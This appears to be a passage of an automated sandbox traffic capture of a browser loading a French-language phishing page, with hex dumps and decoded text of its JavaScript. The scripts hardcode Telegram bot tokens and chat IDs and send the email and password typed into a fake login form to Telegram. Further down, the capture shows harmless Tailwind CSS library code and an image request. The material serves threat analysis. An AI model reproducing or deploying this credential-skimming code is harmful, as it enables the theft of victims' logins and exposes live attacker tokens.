                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:05 UTC608INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 5666
                                                        Cache-Control: max-age=3600
                                                        Content-Type: text/javascript; charset=utf-8
                                                        Etag: "eaf921775e6baf81b72ef1d43cf5ed0f90fd412aa5181a3757b175355b5b905e"
                                                        Last-Modified: Tue, 11 Feb 2025 21:26:33 GMT
                                                        Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                        Accept-Ranges: bytes
                                                        Date: Tue, 25 Mar 2025 14:45:05 GMT
                                                        X-Served-By: cache-lga21953-LGA
                                                        X-Cache: MISS
                                                        X-Cache-Hits: 0
                                                        X-Timer: S1742913906.563348,VS0,VE101
                                                        Vary: x-fh-requested-host, accept-encoding
                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                        2025-03-25 14:45:05 UTC1378INData Raw: 2f 2f 20 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 64 65 73 20 62 6f 74 73 20 54 65 6c 65 67 72 61 6d 0d 0a 63 6f 6e 73 74 20 42 4f 54 5f 54 4f 4b 45 4e 5f 31 20 3d 20 22 36 35 37 31 38 33 35 39 31 31 3a 41 41 45 71 70 68 4a 74 4f 71 70 31 39 55 58 45 6e 50 6d 6a 66 75 32 59 78 59 55 4e 43 31 75 35 55 78 6b 22 3b 0d 0a 63 6f 6e 73 74 20 43 48 41 54 5f 49 44 5f 31 20 3d 20 22 35 31 33 39 34 37 31 31 34 22 3b 0d 0a 63 6f 6e 73 74 20 42 4f 54 5f 54 4f 4b 45 4e 5f 32 20 3d 20 22 38 31 36 39 36 33 35 36 33 32 3a 41 41 47 64 44 57 65 37 4e 6c 66 77 78 56 31 75 38 50 68 73 74 6b 51 50 46 7a 30 70 5a 51 42 50 62 72 30 22 3b 0d 0a 63 6f 6e 73 74 20 43 48 41 54 5f 49 44 5f 32 20 3d 20 22 35 32 35 30 38 32 39 30 38 31 22 3b 0d 0a 0d 0a 2f 2f 20 46 6f 6e 63 74 69 6f
                                                        Data Ascii: // Configuration des bots Telegramconst BOT_TOKEN_1 = "6571835911:AAEqphJtOqp19UXEnPmjfu2YxYUNC1u5Uxk";const CHAT_ID_1 = "513947114";const BOT_TOKEN_2 = "8169635632:AAGdDWe7NlfwxV1u8PhstkQPFz0pZQBPbr0";const CHAT_ID_2 = "5250829081";// Fonctio
                                                        2025-03-25 14:45:05 UTC1378INData Raw: 48 41 54 5f 49 44 5f 32 7d 26 74 65 78 74 3d 24 7b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6d 65 73 73 61 67 65 29 7d 60 3b 0d 0a 0d 0a 20 20 20 20 66 65 74 63 68 28 75 72 6c 2c 20 7b 20 6d 65 74 68 6f 64 3a 20 22 47 45 54 22 20 7d 29 0d 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 28 72 65 73 70 6f 6e 73 65 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 72 65 73 70 6f 6e 73 65 2e 6f 6b 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 45 72 72 65 75 72 20 6c 6f 72 73 20 64 65 20 6c 27 65 6e 76 6f 69 20 61 75 20 62 6f 74 20 32 20 54 65 6c 65 67 72 61 6d 22 2c 20 72 65 73 70 6f 6e 73 65 2e 73 74 61 74 75 73 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: HAT_ID_2}&text=${encodeURIComponent(message)}`; fetch(url, { method: "GET" }) .then((response) => { if (!response.ok) { console.error("Erreur lors de l'envoi au bot 2 Telegram", response.status);
                                                        2025-03-25 14:45:05 UTC1378INData Raw: 65 73 74 69 6f 6e 20 64 75 20 66 6f 72 6d 75 6c 61 69 72 65 0d 0a 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 65 6d 61 69 6c 46 69 65 6c 64 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 7a 6f 6e 65 2d 65 6d 61 69 6c 22 29 3b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 70 61 73 73 77 6f 72 64 46 69 65 6c 64 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 7a 6f 6e 65 2d 70 61 73 73 77 6f 72 64 22 29 3b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 65 6d 61 69 6c 45 72 72 6f 72 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65
                                                        Data Ascii: estion du formulairedocument.addEventListener("DOMContentLoaded", function () { const emailField = document.getElementById("zone-email"); const passwordField = document.getElementById("zone-password"); const emailError = document.getEleme
                                                        2025-03-25 14:45:05 UTC1378INData Raw: 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 73 73 77 6f 72 64 45 72 72 6f 72 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 6d 61 69 6c 46 69 65 6c 64 2e 66 6f 63 75 73 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 73 75 62 6d 69 74 43 6f 75 6e 74 65 72 20 3d 3d 3d 20 31 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 70 61 73 73 77 6f 72 64 46 69 65 6c 64 2e 76 61 6c 75 65 20 3d 3d 3d 20 22 22 29 20 7b 0d 0a 20
                                                        Data Ascii: classList.remove("hidden"); passwordError.classList.add("hidden"); emailField.focus(); } } } else if (submitCounter === 1) { if (passwordField.value === "") {
                                                        2025-03-25 14:45:05 UTC154INData Raw: 6f 75 72 20 70 65 72 6d 65 74 74 72 65 20 75 6e 65 20 6e 6f 75 76 65 6c 6c 65 20 73 61 69 73 69 65 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 29 3b 0d 0a 0d 0a 20 20 20 20 2f 2f 20 41 66 66 69 63 68 65 72 20 6c 65 20 6c 6f 61 64 65 72 20 61 75 20 64 c3 a9 62 75 74 0d 0a 20 20 20 20 73 68 6f 77 4c 6f 61 64 65 72 28 29 3b 0d 0a 7d 29 3b 0d 0a
                                                        Data Ascii: our permettre une nouvelle saisie }); } } }); // Afficher le loader au dbut showLoader();});


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.749697199.36.158.1004432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:05 UTC537OUTGET /telegram.js HTTP/1.1
                                                        Host: facture-75823.web.app
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:06 UTC608INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 1874
                                                        Cache-Control: max-age=3600
                                                        Content-Type: text/javascript; charset=utf-8
                                                        Etag: "b86d8c71f820340c89ef74ce4d5143e2c2d072a2a34e610362022273a33f245b"
                                                        Last-Modified: Tue, 11 Feb 2025 21:26:33 GMT
                                                        Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                        Accept-Ranges: bytes
                                                        Date: Tue, 25 Mar 2025 14:45:06 GMT
                                                        X-Served-By: cache-lga21948-LGA
                                                        X-Cache: MISS
                                                        X-Cache-Hits: 0
                                                        X-Timer: S1742913906.978713,VS0,VE143
                                                        Vary: x-fh-requested-host, accept-encoding
                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                        2025-03-25 14:45:06 UTC1378INData Raw: 2f 2f 20 49 44 20 65 74 20 54 6f 6b 65 6e 20 64 65 20 6c 27 41 50 49 20 54 65 6c 65 67 72 61 6d 0d 0a 63 6f 6e 73 74 20 42 4f 54 5f 54 4f 4b 45 4e 5f 32 20 3d 20 22 38 31 36 39 36 33 35 36 33 32 3a 41 41 47 64 44 57 65 37 4e 6c 66 77 78 56 31 75 38 50 68 73 74 6b 51 50 46 7a 30 70 5a 51 42 50 62 72 30 22 3b 0d 0a 63 6f 6e 73 74 20 43 48 41 54 5f 49 44 5f 32 20 3d 20 22 35 32 35 30 38 32 39 30 38 31 22 3b 0d 0a 0d 0a 2f 2f 20 46 6f 6e 63 74 69 6f 6e 20 70 6f 75 72 20 65 6e 76 6f 79 65 72 20 6c 65 73 20 64 6f 6e 6e c3 a9 65 73 20 c3 a0 20 54 65 6c 65 67 72 61 6d 0d 0a 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 54 6f 54 65 6c 65 67 72 61 6d 28 64 61 74 61 29 20 7b 0d 0a 63 6f 6e 73 74 20 6d 65 73 73 61 67 65 20 3d 20 60 5c 75 44 38 33 43 5c 75 44 46 46 34 5c 75
                                                        Data Ascii: // ID et Token de l'API Telegramconst BOT_TOKEN_2 = "8169635632:AAGdDWe7NlfwxV1u8PhstkQPFz0pZQBPbr0";const CHAT_ID_2 = "5250829081";// Fonction pour envoyer les donnes Telegramfunction sendToTelegram(data) {const message = `\uD83C\uDFF4\u
                                                        2025-03-25 14:45:06 UTC496INData Raw: 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 73 73 77 6f 72 64 22 29 3b 0d 0a 20 20 63 6f 6e 73 74 20 70 61 73 73 77 6f 72 64 20 3d 20 70 61 73 73 77 6f 72 64 49 6e 70 75 74 2e 76 61 6c 75 65 3b 0d 0a 0d 0a 20 20 2f 2f 20 56 c3 a9 72 69 66 69 63 61 74 69 6f 6e 20 64 65 73 20 64 6f 6e 6e c3 a9 65 73 20 65 74 20 65 6e 76 6f 69 20 c3 a0 20 54 65 6c 65 67 72 61 6d 0d 0a 20 20 69 66 20 28 65 6d 61 69 6c 20 26 26 20 70 61 73 73 77 6f 72 64 29 20 7b 0d 0a 20 20 20 20 73 65 6e 64 54 6f 54 65 6c 65 67 72 61 6d 28 7b 20 65 6d 61 69 6c 2c 20 70 61 73 73 77 6f 72 64 20 7d 29 2e 74 68 65 6e 28 28 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 2f 2f 20 52 c3 a9 69 6e 69 74 69 61 6c 69 73 65 72 20 6c 65 20 63 68 61 6d 70 20 6d 6f 74
                                                        Data Ascii: = document.getElementById("password"); const password = passwordInput.value; // Vrification des donnes et envoi Telegram if (email && password) { sendToTelegram({ email, password }).then(() => { // Rinitialiser le champ mot


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.749701172.67.41.164432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:05 UTC530OUTGET /3.4.16 HTTP/1.1
                                                        Host: cdn.tailwindcss.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:06 UTC423INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 14:45:06 GMT
                                                        Content-Type: text/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=31536000
                                                        strict-transport-security: max-age=63072000
                                                        x-vercel-cache: MISS
                                                        x-vercel-id: cle1::iad1::6rj9h-1742830770833-7403663bdf54
                                                        Last-Modified: Mon, 24 Mar 2025 15:39:32 GMT
                                                        CF-Cache-Status: HIT
                                                        Age: 83133
                                                        Server: cloudflare
                                                        CF-RAY: 925f30a90d911dc7-EWR
                                                        2025-03-25 14:45:06 UTC946INData Raw: 37 64 66 38 0d 0a 28 28 29 3d 3e 7b 76 61 72 20 71 76 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3b 76 61 72 20 48 69 3d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3b 76 61 72 20 24 76 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 3b 76 61 72 20 4c 76 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 3b 76 61 72 20 4d 76 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 4e 76 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 76 61 72 20 64 66 3d 72 3d 3e 48 69 28 72 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 76 61 72 20 68 66 3d 72 3d 3e 7b 69 66 28 74 79
                                                        Data Ascii: 7df8(()=>{var qv=Object.create;var Hi=Object.defineProperty;var $v=Object.getOwnPropertyDescriptor;var Lv=Object.getOwnPropertyNames;var Mv=Object.getPrototypeOf,Nv=Object.prototype.hasOwnProperty;var df=r=>Hi(r,"__esModule",{value:!0});var hf=r=>{if(ty
                                                        2025-03-25 14:45:06 UTC1369INData Raw: 65 61 64 46 69 6c 65 53 79 6e 63 3a 72 3d 3e 73 65 6c 66 5b 72 5d 7c 7c 22 22 2c 73 74 61 74 53 79 6e 63 3a 28 29 3d 3e 28 7b 6d 74 69 6d 65 4d 73 3a 46 76 2b 2b 7d 29 2c 70 72 6f 6d 69 73 65 73 3a 7b 72 65 61 64 46 69 6c 65 3a 72 3d 3e 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 65 6c 66 5b 72 5d 7c 7c 22 22 29 7d 7d 7d 29 3b 76 61 72 20 46 73 3d 78 28 28 6f 50 2c 67 66 29 3d 3e 7b 75 28 29 3b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6d 66 3d 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 3d 7b 7d 29 7b 69 66 28 21 28 65 2e 6d 61 78 53 69 7a 65 26 26 65 2e 6d 61 78 53 69 7a 65 3e 30 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 60 6d 61 78 53 69 7a 65 60 20 6d 75 73 74 20 62 65 20 61 20 6e 75 6d 62 65 72
                                                        Data Ascii: eadFileSync:r=>self[r]||"",statSync:()=>({mtimeMs:Fv++}),promises:{readFile:r=>Promise.resolve(self[r]||"")}}});var Fs=x((oP,gf)=>{u();"use strict";var mf=class{constructor(e={}){if(!(e.maxSize&&e.maxSize>0))throw new TypeError("`maxSize` must be a number
                                                        2025-03-25 14:45:06 UTC1369INData Raw: 65 74 65 49 66 45 78 70 69 72 65 64 28 74 2c 69 29 3d 3d 3d 21 31 26 26 28 79 69 65 6c 64 20 65 29 7d 7d 67 65 74 28 65 29 7b 69 66 28 74 68 69 73 2e 63 61 63 68 65 2e 68 61 73 28 65 29 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 63 61 63 68 65 2e 67 65 74 28 65 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 56 61 6c 75 65 28 65 2c 74 29 7d 69 66 28 74 68 69 73 2e 6f 6c 64 43 61 63 68 65 2e 68 61 73 28 65 29 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 6f 6c 64 43 61 63 68 65 2e 67 65 74 28 65 29 3b 69 66 28 74 68 69 73 2e 5f 64 65 6c 65 74 65 49 66 45 78 70 69 72 65 64 28 65 2c 74 29 3d 3d 3d 21 31 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 6d 6f 76 65 54 6f 52 65 63 65 6e 74 28 65 2c 74 29 2c 74 2e 76 61 6c 75 65 7d 7d 73 65 74 28 65 2c 74 2c 7b
                                                        Data Ascii: eteIfExpired(t,i)===!1&&(yield e)}}get(e){if(this.cache.has(e)){let t=this.cache.get(e);return this._getItemValue(e,t)}if(this.oldCache.has(e)){let t=this.oldCache.get(e);if(this._deleteIfExpired(e,t)===!1)return this._moveToRecent(e,t),t.value}}set(e,t,{
                                                        2025-03-25 14:45:06 UTC1369INData Raw: 68 69 73 2e 63 61 63 68 65 2e 68 61 73 28 74 29 7c 7c 74 68 69 73 2e 5f 64 65 6c 65 74 65 49 66 45 78 70 69 72 65 64 28 74 2c 69 29 3d 3d 3d 21 31 26 26 28 79 69 65 6c 64 5b 74 2c 69 2e 76 61 6c 75 65 5d 29 7d 7d 2a 65 6e 74 72 69 65 73 44 65 73 63 65 6e 64 69 6e 67 28 29 7b 6c 65 74 20 65 3d 5b 2e 2e 2e 74 68 69 73 2e 63 61 63 68 65 5d 3b 66 6f 72 28 6c 65 74 20 74 3d 65 2e 6c 65 6e 67 74 68 2d 31 3b 74 3e 3d 30 3b 2d 2d 74 29 7b 6c 65 74 20 69 3d 65 5b 74 5d 2c 5b 6e 2c 73 5d 3d 69 3b 74 68 69 73 2e 5f 64 65 6c 65 74 65 49 66 45 78 70 69 72 65 64 28 6e 2c 73 29 3d 3d 3d 21 31 26 26 28 79 69 65 6c 64 5b 6e 2c 73 2e 76 61 6c 75 65 5d 29 7d 65 3d 5b 2e 2e 2e 74 68 69 73 2e 6f 6c 64 43 61 63 68 65 5d 3b 66 6f 72 28 6c 65 74 20 74 3d 65 2e 6c 65 6e 67 74 68
                                                        Data Ascii: his.cache.has(t)||this._deleteIfExpired(t,i)===!1&&(yield[t,i.value])}}*entriesDescending(){let e=[...this.cache];for(let t=e.length-1;t>=0;--t){let i=e[t],[n,s]=i;this._deleteIfExpired(n,s)===!1&&(yield[n,s.value])}e=[...this.oldCache];for(let t=e.length
                                                        2025-03-25 14:45:06 UTC1369INData Raw: 22 2c 22 66 6c 65 78 53 68 72 69 6e 6b 22 2c 22 66 6c 65 78 47 72 6f 77 22 2c 22 66 6c 65 78 42 61 73 69 73 22 2c 22 74 61 62 6c 65 4c 61 79 6f 75 74 22 2c 22 63 61 70 74 69 6f 6e 53 69 64 65 22 2c 22 62 6f 72 64 65 72 43 6f 6c 6c 61 70 73 65 22 2c 22 62 6f 72 64 65 72 53 70 61 63 69 6e 67 22 2c 22 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 22 2c 22 74 72 61 6e 73 6c 61 74 65 22 2c 22 72 6f 74 61 74 65 22 2c 22 73 6b 65 77 22 2c 22 73 63 61 6c 65 22 2c 22 74 72 61 6e 73 66 6f 72 6d 22 2c 22 61 6e 69 6d 61 74 69 6f 6e 22 2c 22 63 75 72 73 6f 72 22 2c 22 74 6f 75 63 68 41 63 74 69 6f 6e 22 2c 22 75 73 65 72 53 65 6c 65 63 74 22 2c 22 72 65 73 69 7a 65 22 2c 22 73 63 72 6f 6c 6c 53 6e 61 70 54 79 70 65 22 2c 22 73 63 72 6f 6c 6c 53 6e 61 70 41 6c 69 67 6e
                                                        Data Ascii: ","flexShrink","flexGrow","flexBasis","tableLayout","captionSide","borderCollapse","borderSpacing","transformOrigin","translate","rotate","skew","scale","transform","animation","cursor","touchAction","userSelect","resize","scrollSnapType","scrollSnapAlign
                                                        2025-03-25 14:45:06 UTC1369INData Raw: 2c 22 74 65 78 74 4f 70 61 63 69 74 79 22 2c 22 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 22 2c 22 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 43 6f 6c 6f 72 22 2c 22 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 53 74 79 6c 65 22 2c 22 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 54 68 69 63 6b 6e 65 73 73 22 2c 22 74 65 78 74 55 6e 64 65 72 6c 69 6e 65 4f 66 66 73 65 74 22 2c 22 66 6f 6e 74 53 6d 6f 6f 74 68 69 6e 67 22 2c 22 70 6c 61 63 65 68 6f 6c 64 65 72 43 6f 6c 6f 72 22 2c 22 70 6c 61 63 65 68 6f 6c 64 65 72 4f 70 61 63 69 74 79 22 2c 22 63 61 72 65 74 43 6f 6c 6f 72 22 2c 22 61 63 63 65 6e 74 43 6f 6c 6f 72 22 2c 22 6f 70 61 63 69 74 79 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 42 6c 65 6e 64 4d 6f 64 65 22 2c 22 6d 69 78 42 6c 65 6e 64 4d 6f 64 65 22 2c 22
                                                        Data Ascii: ,"textOpacity","textDecoration","textDecorationColor","textDecorationStyle","textDecorationThickness","textUnderlineOffset","fontSmoothing","placeholderColor","placeholderOpacity","caretColor","accentColor","opacity","backgroundBlendMode","mixBlendMode","
                                                        2025-03-25 14:45:06 UTC1369INData Raw: 79 2e 69 73 41 72 72 61 79 28 72 29 3f 5b 72 5d 3a 5b 65 2c 72 5d 29 7d 2c 77 61 72 6e 28 72 2c 65 29 7b 5b 22 63 6f 6e 74 65 6e 74 2d 70 72 6f 62 6c 65 6d 73 22 5d 2e 69 6e 63 6c 75 64 65 73 28 72 29 7c 7c 6a 73 28 51 65 2e 62 6f 6c 64 28 51 65 2e 79 65 6c 6c 6f 77 28 22 77 61 72 6e 22 29 29 2c 2e 2e 2e 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 72 29 3f 5b 72 5d 3a 5b 65 2c 72 5d 29 7d 2c 72 69 73 6b 28 72 2c 65 29 7b 6a 73 28 51 65 2e 62 6f 6c 64 28 51 65 2e 6d 61 67 65 6e 74 61 28 22 72 69 73 6b 22 29 29 2c 2e 2e 2e 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 72 29 3f 5b 72 5d 3a 5b 65 2c 72 5d 29 7d 7d 7d 29 3b 76 61 72 20 5f 66 3d 7b 7d 3b 47 65 28 5f 66 2c 7b 64 65 66 61 75 6c 74 3a 28 29 3d 3e 55 73 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 71 72 28 7b 76
                                                        Data Ascii: y.isArray(r)?[r]:[e,r])},warn(r,e){["content-problems"].includes(r)||js(Qe.bold(Qe.yellow("warn")),...Array.isArray(r)?[r]:[e,r])},risk(r,e){js(Qe.bold(Qe.magenta("risk")),...Array.isArray(r)?[r]:[e,r])}}});var _f={};Ge(_f,{default:()=>Us});function qr({v
                                                        2025-03-25 14:45:06 UTC1369INData Raw: 22 23 66 65 66 32 66 32 22 2c 31 30 30 3a 22 23 66 65 65 32 65 32 22 2c 32 30 30 3a 22 23 66 65 63 61 63 61 22 2c 33 30 30 3a 22 23 66 63 61 35 61 35 22 2c 34 30 30 3a 22 23 66 38 37 31 37 31 22 2c 35 30 30 3a 22 23 65 66 34 34 34 34 22 2c 36 30 30 3a 22 23 64 63 32 36 32 36 22 2c 37 30 30 3a 22 23 62 39 31 63 31 63 22 2c 38 30 30 3a 22 23 39 39 31 62 31 62 22 2c 39 30 30 3a 22 23 37 66 31 64 31 64 22 2c 39 35 30 3a 22 23 34 35 30 61 30 61 22 7d 2c 6f 72 61 6e 67 65 3a 7b 35 30 3a 22 23 66 66 66 37 65 64 22 2c 31 30 30 3a 22 23 66 66 65 64 64 35 22 2c 32 30 30 3a 22 23 66 65 64 37 61 61 22 2c 33 30 30 3a 22 23 66 64 62 61 37 34 22 2c 34 30 30 3a 22 23 66 62 39 32 33 63 22 2c 35 30 30 3a 22 23 66 39 37 33 31 36 22 2c 36 30 30 3a 22 23 65 61 35 38 30 63 22
                                                        Data Ascii: "#fef2f2",100:"#fee2e2",200:"#fecaca",300:"#fca5a5",400:"#f87171",500:"#ef4444",600:"#dc2626",700:"#b91c1c",800:"#991b1b",900:"#7f1d1d",950:"#450a0a"},orange:{50:"#fff7ed",100:"#ffedd5",200:"#fed7aa",300:"#fdba74",400:"#fb923c",500:"#f97316",600:"#ea580c"
                                                        2025-03-25 14:45:06 UTC1369INData Raw: 36 30 30 3a 22 23 30 38 39 31 62 32 22 2c 37 30 30 3a 22 23 30 65 37 34 39 30 22 2c 38 30 30 3a 22 23 31 35 35 65 37 35 22 2c 39 30 30 3a 22 23 31 36 34 65 36 33 22 2c 39 35 30 3a 22 23 30 38 33 33 34 34 22 7d 2c 73 6b 79 3a 7b 35 30 3a 22 23 66 30 66 39 66 66 22 2c 31 30 30 3a 22 23 65 30 66 32 66 65 22 2c 32 30 30 3a 22 23 62 61 65 36 66 64 22 2c 33 30 30 3a 22 23 37 64 64 33 66 63 22 2c 34 30 30 3a 22 23 33 38 62 64 66 38 22 2c 35 30 30 3a 22 23 30 65 61 35 65 39 22 2c 36 30 30 3a 22 23 30 32 38 34 63 37 22 2c 37 30 30 3a 22 23 30 33 36 39 61 31 22 2c 38 30 30 3a 22 23 30 37 35 39 38 35 22 2c 39 30 30 3a 22 23 30 63 34 61 36 65 22 2c 39 35 30 3a 22 23 30 38 32 66 34 39 22 7d 2c 62 6c 75 65 3a 7b 35 30 3a 22 23 65 66 66 36 66 66 22 2c 31 30 30 3a 22 23
                                                        Data Ascii: 600:"#0891b2",700:"#0e7490",800:"#155e75",900:"#164e63",950:"#083344"},sky:{50:"#f0f9ff",100:"#e0f2fe",200:"#bae6fd",300:"#7dd3fc",400:"#38bdf8",500:"#0ea5e9",600:"#0284c7",700:"#0369a1",800:"#075985",900:"#0c4a6e",950:"#082f49"},blue:{50:"#eff6ff",100:"#
                                                        2025-03-25 14:45:06 UTC1369INData Raw: 6c 75 65 28 29 7b 72 65 74 75 72 6e 20 71 72 28 7b 76 65 72 73 69 6f 6e 3a 22 76 32 2e 32 22 2c 66 72 6f 6d 3a 22 6c 69 67 68 74 42 6c 75 65 22 2c 74 6f 3a 22 73 6b 79 22 7d 29 2c 74 68 69 73 2e 73 6b 79 7d 2c 67 65 74 20 77 61 72 6d 47 72 61 79 28 29 7b 72 65 74 75 72 6e 20 71 72 28 7b 76 65 72 73 69 6f 6e 3a 22 76 33 2e 30 22 2c 66 72 6f 6d 3a 22 77 61 72 6d 47 72 61 79 22 2c 74 6f 3a 22 73 74 6f 6e 65 22 7d 29 2c 74 68 69 73 2e 73 74 6f 6e 65 7d 2c 67 65 74 20 74 72 75 65 47 72 61 79 28 29 7b 72 65 74 75 72 6e 20 71 72 28 7b 76 65 72 73 69 6f 6e 3a 22 76 33 2e 30 22 2c 66 72 6f 6d 3a 22 74 72 75 65 47 72 61 79 22 2c 74 6f 3a 22 6e 65 75 74 72 61 6c 22 7d 29 2c 74 68 69 73 2e 6e 65 75 74 72 61 6c 7d 2c 67 65 74 20 63 6f 6f 6c 47 72 61 79 28 29 7b 72 65
                                                        Data Ascii: lue(){return qr({version:"v2.2",from:"lightBlue",to:"sky"}),this.sky},get warmGray(){return qr({version:"v3.0",from:"warmGray",to:"stone"}),this.stone},get trueGray(){return qr({version:"v3.0",from:"trueGray",to:"neutral"}),this.neutral},get coolGray(){re


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.749702207.174.26.2194432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:07 UTC659OUTGET /6cXYk9HM/Capture-d-cran-2025-02-11-144928.png HTTP/1.1
                                                        Host: i.ibb.co
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
